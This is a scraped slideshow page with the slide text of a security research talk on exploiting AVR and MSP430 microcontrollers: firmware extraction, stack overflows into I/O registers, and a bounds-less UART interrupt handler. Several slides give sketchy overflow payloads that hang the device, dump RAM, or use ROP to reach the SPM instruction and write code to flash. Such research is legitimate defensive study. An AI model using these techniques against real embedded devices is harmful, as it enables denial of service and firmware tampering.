Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Vadim Bardakov - AVR & MSP exploitation

1,497 views

Published on

Published in: Technology, News & Politics
  • Be the first to comment

  • Be the first to like this

Vadim Bardakov - AVR & MSP exploitation

  1. 1. AVR & MSP exploitation Vadim Bardakov Security Researcher Digital Security (ERPScan)
  2. 2. AVR & MSP exploitation Why now? • Inc. usage of uC • Nobody cares about code security for these devices © 2002—2013, Digital Security 2
  3. 3. AVR & MSP exploitation Why now? • Inc. usage of uC • Nobody cares about code security for these devices • Inc. amount of easily accessible data channels • Microcontroller firmware can be retrieved © 2002—2013, Digital Security 3
  4. 4. AVR & MSP exploitation Jokes © 2002—2013, Digital Security 4
  5. 5. AVR & MSP exploitation What if it works? © 2002—2013, Digital Security 5
  6. 6. AVR & MSP exploitation Oops… © 2002—2013, Digital Security 6
  7. 7. AVR & MSP exploitation Firmware extraction Side channel attacks • Power analysis © 2002—2013, Digital Security 7
  8. 8. AVR & MSP exploitation Firmware extraction Side channel attacks • Power analysis • Planarization • etc. © 2002—2013, Digital Security 8
  9. 9. AVR & MSP exploitation Firmware extraction MSP430: • FRAM • 5xx • 6xx © 2002—2013, Digital Security 9
  10. 10. AVR & MSP exploitation RAM MSP © 2002—2013, Digital Security AVR 10
  11. 11. AVR & MSP exploitation RAM General purpose registers I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security 11
  12. 12. AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security 12
  13. 13. AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers SP Additional I/O registers Internal RAM © 2002—2013, Digital Security ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff 13
  14. 14. AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers Interrupt handler: UART Timers Comparators INT0..X © 2002—2013, Digital Security Additional I/O registers Internal RAM SP ffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff 14
  15. 15. AVR & MSP exploitation Stack errors General purpose registers SP Interrupt handler: UART Timers Comparators INT0..X © 2002—2013, Digital Security I/O Special Function Registers Additional I/O registers Internal RAM ffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff 15
  16. 16. AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Lost control I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 16
  17. 17. AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Lost control I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 17
  18. 18. AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Lost control I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 18
  19. 19. AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Lost control I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 19
  20. 20. AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Seems OK I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 20202020202020 20202020202020 20202020202020 20202020202020 20202020202020 20202020202020 20202020202020 20202020202020 20
  21. 21. AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers Additional I/O registers Unknown offset Global Variables Internal RAM © 2002—2013, Digital Security 21
  22. 22. AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers Additional I/O registers Bypassing checks © 2002—2013, Digital Security Internal RAM 22
  23. 23. AVR & MSP exploitation Buffer overflow Access: • Local variables • Return address: • Compiler-generated instructions • Interruption • Bootloader © 2002—2013, Digital Security 23
  24. 24. AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } Casual for UART handlers © 2002—2013, Digital Security 24
  25. 25. AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } print “xff”xB . “x010xFC”xN Atmel Studio 6.1 000001FB CLI 000001FC RJMP PC-0x0000 © 2002—2013, Digital Security 25
  26. 26. AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } print “xff”xN 000001FB CLI 000001FC RJMP PC-0x0000 © 2002—2013, Digital Security 26
  27. 27. AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } print “xff”xN 000001FB CLI 000001FC RJMP PC-0x0000 DoS © 2002—2013, Digital Security 27
  28. 28. AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } void uart_puts(const char *s ) { while (*s) uart_putc(*s++); print “xff”xB . “x010xFC”xN. P uart_puts(p); 000001C8 LDD R24,Y+1 000001CA LDD R25, Y+2 000001CB CALL 0x0000014E Load indirect with displacement Load immediate Call subroutine Dumping RAM } © 2002—2013, Digital Security 28
  29. 29. AVR & MSP exploitation Reprogramming © 2002—2013, Digital Security 29
  30. 30. AVR & MSP exploitation Reprogramming Open-source bootloaders sucks in production. © 2002—2013, Digital Security 30
  31. 31. AVR & MSP exploitation Reprogramming Load code to RAM print “xff”xB . “x000x16”xN. ROPTail Interruption handler Ideal for ROP © 2002—2013, Digital Security 31
  32. 32. AVR & MSP exploitation Reprogramming Gain control to SPM print Code . “x000xFC”xN. P Atmex +00000343: 95E8 …. +00000351: 95E8 SPM Store program memory SPM Store program memory Writing code to FLASH © 2002—2013, Digital Security 32
  33. 33. AVR & MSP exploitation Sum • Simple attacks can be conducted blindly • Different consequences: • DoS • Modifying device configuration • etc. © 2002—2013, Digital Security 33
  34. 34. Digital Security in Moscow: +7 (495) 223-07-86 Digital Security in Saint Petersburg: +7 (812) 703-15-47 www.dsec.ru www.erpscan.com v.bardakov@dsec.ru © 2002—2013, Digital Security 34

×